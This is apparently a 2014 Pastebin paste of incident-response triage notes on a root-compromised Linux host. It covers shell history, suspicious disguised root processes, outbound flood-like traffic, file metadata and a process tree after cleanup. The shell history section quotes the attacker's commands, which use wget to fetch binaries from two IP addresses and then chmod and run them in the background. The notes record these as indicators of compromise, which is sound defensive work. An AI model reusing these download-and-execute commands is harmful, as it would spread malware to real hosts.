Virus analysis — triage notes for a compromised Linux host (malware running as root, August 2014)

a guest
Aug 26th, 2014
441
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.18 KB | None | 0 0
  1. 1. history 记录 — root shell history (the attacker's download-and-execute sequence). The two wget hosts and the file names TSmww / ymso below are indicators of compromise; hash the downloaded binaries (e.g. sha256sum) before deleting them, since these notes record no sample hashes.
  2. 1 passwd
  3. 2 wget http://183.56.168.220:8080/TSmww
  4. 3 chmod 0755 /root/TSmww
  5. 4 nohup /root/TSmww > /dev/null 2>&1 &
  6. 5 ifconfig
  7. 6 chmod 0755 /root/TSmww
  8. 7 nohup /root/TSmww > /dev/null 2>&1 &
  9. 8 chmod 0755 /root/TSmww
  10. 9 nohup /root/TSmww > /dev/null 2>&1 &
  11. 10 wget http://183.60.202.61:8082/ymso
  12. 11 chmod 0755 ymso
  13. 12 ./ymso &
  14. 13 chmod 0755 ymso
  15. 14 ./ymso &
  16.  
  17. 2. 查看文件 — listing of /root. conf.n was written on Aug 26 03:14 next to the ymso binary; TSmww, which the history shows being written to /root, is not in this listing and its absence is not explained here.
  18. root@140322in04:~# ls -l
  19. total 1120
  20. -rw-r--r-- 1 root root 69 Aug 26 03:14 conf.n
  21. -rwxr-xr-x 1 root root 1135000 Aug 19 18:41 ymso
  22.  
  23. 3. web登录页面后台记录 — web backend login log
  24. 没有异常 (no anomalies). Caveat: a clean web login log does not establish how the attacker obtained root; the initial access vector is not identified anywhere in these notes.
  25.  
  26. 4. iftop流量分析 — iftop traffic snapshot. About ten flows each push ~500 kb/s outbound to 110.50.x.x / 114.141.73.125 hosts with only a few kb/s returning, which is consistent with the host being used as a flood (DDoS) source. The small bidirectional flows to 107.150.42.203 and the EC2 host are candidate control connections; confirm them with ss/netstat -p against the suspicious processes listed below.
  27. 140322in04 => 110.50.234.209 511kb 540kb 540kb
  28. <= 22.2kb 22.3kb 22.3kb
  29. 140322in04 => 110.50.237.157 511kb 539kb 539kb
  30. <= 22.2kb 22.2kb 22.2kb
  31. 140322in04 => 114.141.73.125 503kb 537kb 537kb
  32. <= 21.3kb 21.5kb 21.5kb
  33. 140322in04 => 110.50.234.201 508kb 537kb 537kb
  34. <= 19.4kb 20.1kb 20.1kb
  35. 140322in04 => 110.50.234.210 507kb 536kb 536kb
  36. <= 18.6kb 19.2kb 19.2kb
  37. 140322in04 => 110.50.227.153 502kb 533kb 533kb
  38. <= 16.3kb 17.2kb 17.2kb
  39. 140322in04 => 110.50.230.44 497kb 525kb 525kb
  40. <= 7.56kb 6.88kb 6.88kb
  41. 140322in04 => 110.50.230.55 496kb 525kb 525kb
  42. <= 6.36kb 5.61kb 5.61kb
  43. 140322in04 => 110.50.230.39 493kb 522kb 522kb
  44. <= 7.05kb 5.67kb 5.67kb
  45. 140322in04 => 110.50.230.21 445kb 470kb 470kb
  46. <= 5.84kb 5.21kb 5.21kb
  47. 140322in04 => 110.50.230.30 43.3kb 51.7kb 51.7kb
  48. <= 0b 0b 0b
  49. 140322in04 => 107.150.42.203 3.52kb 3.83kb 3.83kb
  50. <= 2.34kb 2.55kb 2.55kb
  51. 140322in04 => ec2-54-215-6-163.us-west-1.compute.amazonaws.com 5.91kb 5.42kb 5.42kb
  52. <= 416b 347b 347b
  53. 140322in04 => google-public-dns-a.google.com 0b 1.60kb 1.60kb
  54. <= 0b 3.09kb 3.09kb
  55.  
  56.  
  57.  
  58. 5. 可疑的进程 — suspicious processes. All run as root from /tmp, /etc or /usr/bin under names that mimic system daemons (.sshd, .SSH2, gdmorpen, smarvtd, whitptabil, sfewfesf); executables running from /tmp or /etc is itself anomalous. Capture /proc/<pid>/exe, cmdline and open sockets for each PID before killing anything, or the evidence is lost.
  59. root 16533 0.0 1.0 1018648 2640 ? Ss Aug22 0:00 /etc/nhgbhhj
  60. root 17324 0.0 1.0 1018648 2640 ? S Aug22 0:05 /etc/nhgbhhj
  61. root 17326 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  62. root 17327 0.0 1.0 1018648 2640 ? S Aug22 0:54 /etc/nhgbhhj
  63. root 17328 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  64. root 17329 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  65. root 17330 0.0 1.0 1018648 2640 ? S Aug22 0:07 /etc/nhgbhhj
  66. root 17331 0.0 1.0 1018648 2640 ? S Aug22 0:00 /etc/nhgbhhj
  67. root 17332 0.0 1.0 1018648 2640 ? S Aug22 1:06 /etc/nhgbhhj
  68.  
  69. root 15979 0.0 0.2 9180 564 ? Ss 07:05 0:00 /tmp/.sshdd1409051099
  70. root 3766 0.0 0.0 980 128 ? Ss Aug22 0:38 /etc/.SSHH2
  71. root 3803 0.0 0.0 980 156 ? Ss Aug22 0:37 /etc/.SSH2
  72. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
  73. root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:18 /tmp/gdmorpen
  74. root 2372 0.4 0.3 105924 1024 ? Ssl 06:41 0:08 /tmp/sfewfesfs
  75. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:16 /tmp/smarvtd
  76.  
  77.  
  78. root 19092 0.2 0.6 431804 1828 ? Ssl Aug25 2:08 /etc/gdmorpen
  79. root 19120 0.2 0.6 431804 1824 ? Ssl Aug25 2:08 /etc/smarvtd
  80. root 19121 0.2 0.6 431804 1828 ? Ssl Aug25 2:14 /etc/whitptabil
  81. root 19122 0.2 0.6 431804 1832 ? Ssl Aug25 2:15 /tmp/gdmorpen
  82. root 19128 0.2 0.6 431804 1824 ? Ssl Aug25 2:14 /tmp/smarvtd
  83. root 19560 0.1 0.4 109128 1084 ? Ssl Aug25 1:50 /etc/sfewfesf
  84. root 2869 0.0 0.2 11716 544 ? Ssl 06:41 0:00 /usr/bin/.sshd
  85.  
  86. 6. stat 查询文件 — file metadata. /etc/gdmorpen is mode 7777 (setuid, setgid, sticky and world-writable) and owned by root. Note the timestamps: Modify (2014-07-28) predates Change (2014-08-25 14:40:54) by almost a month, so the mtime was most likely carried over from the source or back-dated; ctime, which touch cannot set, shows the file was placed on this host on Aug 25.
  87. root@140322in04:/run# ls -l /etc/gdmorpen
  88. -rwsrwsrwt 1 root root 487672 Jul 28 03:58 /etc/gdmorpen
  89. root@140322in04:/run# stat /etc/gdmorpen
  90. File: ‘/etc/gdmorpen’
  91. Size: 487672 Blocks: 968 IO Block: 4096 regular file
  92. Device: 917bh/37243d Inode: 75497505 Links: 1
  93. Access: (7777/-rwsrwsrwt) Uid: ( 0/ root) Gid: ( 0/ root)
  94. Access: 2014-08-25 14:40:57.000000000 -0400
  95. Modify: 2014-07-28 03:58:15.000000000 -0400
  96. Change: 2014-08-25 14:40:54.000000000 -0400
  97. Birth: -
  98.  
  99.  
  100.  
  101. 7. 杀死很多/etc/ /tmp程序后,pstree列表 — pstree after killing many of the /etc and /tmp binaries. Processes of the .sshdd*/.sshhdd* family are still present (the suffix differs from /tmp/.sshdd1409051099 above, which may only be pstree's 15-character name truncation rather than a respawn — check /proc/<pid>/exe), and whitptabil and an "agent" process (origin not established here) are still running. Killing processes is therefore not removing the infection: a persistence mechanism (cron, init/upstart jobs, rc.local, ld.so.preload) is likely but not examined in these notes. Given a root-level compromise, rebuilding the host from known-good media and rotating the root password and any credentials stored on it is the safer outcome.
  102. init─┬─.SSH2───sh───ps───sh───ps
  103. ├─.SSHH2───sh
  104. ├─.sshdd140905177───.sshdd140905177─┬─.sshdd140905177───sh───ps───ps
  105. │ └─3*[.sshdd140905177]
  106. ├─.sshhdd14087083───.sshhdd14087083─┬─4*[.sshhdd14087083]
  107. │ └─2*[.sshhdd14087083───sh]
  108. ├─.sshhdd14087083───.sshhdd14087083─┬─7*[.sshhdd14087083]
  109. │ ├─.sshhdd14087083───sh
  110. │ └─.sshhdd14087083───2*[sh]
  111. ├─agent───7*[{agent}]
  112. ├─cron
  113. ├─2*[getty]
  114. ├─getty───8*[{getty}]
  115. ├─kthreadd/662───khelper/662
  116. ├─master─┬─pickup
  117. │ ├─qmgr
  118. │ └─tlsmgr
  119. ├─rsyslogd───2*[{rsyslogd}]
  120. ├─saslauthd───saslauthd
  121. ├─screen───bash
  122. ├─sshd───sshd───bash───pstree
  123. ├─systemd-udevd
  124. ├─upstart-file-br
  125. ├─upstart-socket-
  126. ├─upstart-udev-br
  127. ├─whitptabil───42*[{whitptabil}]
  128. └─xinetd